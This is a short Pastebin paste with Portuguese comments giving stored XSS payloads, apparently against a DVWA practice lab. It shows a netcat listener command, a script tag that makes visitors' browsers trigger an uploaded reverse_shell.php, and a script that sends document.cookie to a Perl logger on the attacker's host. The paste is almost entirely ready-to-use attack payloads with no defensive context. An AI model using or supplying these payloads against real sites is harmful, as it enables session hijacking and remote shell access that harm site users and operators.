Advertisement
DarkProgrammer000

Injection [connection]

Jul 8th, 2021 (edited)
1,147
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // Exemplo: XSS - Stored
  2. // Hacker: nc -lvp 666
  3. // Alvo: http://192.168.0.19/dvwa/hackable/uploads/reverse_shell.php
  4.  
  5. // Chamando Reverse shell dentro do server
  6. <script>window.location="http://192.168.0.19/dvwa/hackable/uploads/reverse_shell.php"</script>
  7.  
  8. // PExtra: egar Cookie chamando documento no seu server Apache2 no /usr/lib/cgi-bin na maquina atacante
  9. <script>document.location="http://192.168.0.16/cgi-bin/logit.pl?"+document.cookie</script>
  10.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement